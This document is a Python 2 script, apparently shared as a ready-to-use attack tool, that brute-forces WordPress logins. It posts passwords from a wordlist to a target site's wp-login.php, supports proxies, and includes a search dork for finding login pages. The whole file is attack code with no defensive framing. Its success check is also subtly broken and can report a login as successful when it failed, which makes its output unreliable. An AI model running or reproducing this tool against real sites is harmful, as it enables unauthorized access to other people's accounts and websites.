WordPress Brute Force

1. #!/usr/bin/python
2. #WordPress Brute Force (wp-login.php)
3.  
4. #If cookies enabled brute force will not work (yet)
5. #Change response on line 97 if needed. (language)
6.  
7. #Dork: inurl:wp-login.php
8.  
9.  
10. import urllib2, sys, re, urllib, httplib, socket
11.  
12. print "\n    WordPressBF v1.0"
13. print "----------------------------------------------"
14.  
15. if len(sys.argv) not in [4,5,6,7]:
16.     print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
17.     print "\t   -p/-proxy <host:port> : Add proxy support"
18.     print "\t   -v/-verbose : Verbose Mode\n"
19.     sys.exit(1)
20.    
21. for arg in sys.argv[1:]:
22.     if arg.lower() == "-p" or arg.lower() == "-proxy":
23.         proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
24.     if arg.lower() == "-v" or arg.lower() == "-verbose":
25.         verbose = 1
26.        
27. try:
28.     if proxy:
29.         print "\n[+] Testing Proxy..."
30.         h2 = httplib.HTTPConnection(proxy)
31.         h2.connect()
32.         print "[+] Proxy:",proxy
33. except(socket.timeout):
34.     print "\n[-] Proxy Timed Out"
35.     proxy = 0
36.     pass
37. except(NameError):
38.     print "\n[-] Proxy Not Given"
39.     proxy = 0
40.     pass
41. except:
42.     print "\n[-] Proxy Failed"
43.     proxy = 0
44.     pass
45.    
46. try:
47.     if verbose == 1:
48.         print "[+] Verbose Mode On\n"
49. except(NameError):
50.     print "[-] Verbose Mode Off\n"
51.     verbose = 0
52.     pass
53.    
54. if sys.argv[1][:7] != "http://":
55.     host = "http://"+sys.argv[1]
56. else:
57.     host = sys.argv[1]
58.    
59. print "[+] BruteForcing:",host
60. print "[+] User:",sys.argv[2]
61.  
62. try:
63.     words = open(sys.argv[3], "r").readlines()
64.     print "[+] Words Loaded:",len(words),"\n"
65. except(IOError):
66.     print "[-] Error: Check your wordlist path\n"
67.     sys.exit(1)
68.  
69. for word in words:
70.     word = word.replace("\r","").replace("\n","")
71.     login_form_seq = [
72.         ('log', sys.argv[2]),
73.         ('pwd', word),
74.         ('rememberme', 'forever'),
75.         ('wp-submit', 'Login >>'),
76.         ('redirect_to', 'wp-admin/')]
77.     login_form_data = urllib.urlencode(login_form_seq)
78.     if proxy != 0:
79.         proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
80.         opener = urllib2.build_opener(proxy_handler)
81.     else:
82.         opener = urllib2.build_opener()
83.     try:
84.         site = opener.open(host, login_form_data).read()
85.     except(urllib2.URLError), msg:
86.         print msg
87.         site = ""
88.         pass
89.  
90.     if re.search("WordPress requires Cookies",site):
91.         print "[-] Failed: WordPress has cookies enabled\n"
92.         sys.exit(1)
93.        
94.     #Change this response if different. (language)
95.     if re.search("<strong>ERROR</strong>",site) and verbose == 1:
96.         print "[-] Login Failed:",word
97.     else:
98.         print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
99.         sys.exit(1)
100. print "\n[-] Brute Complete\n"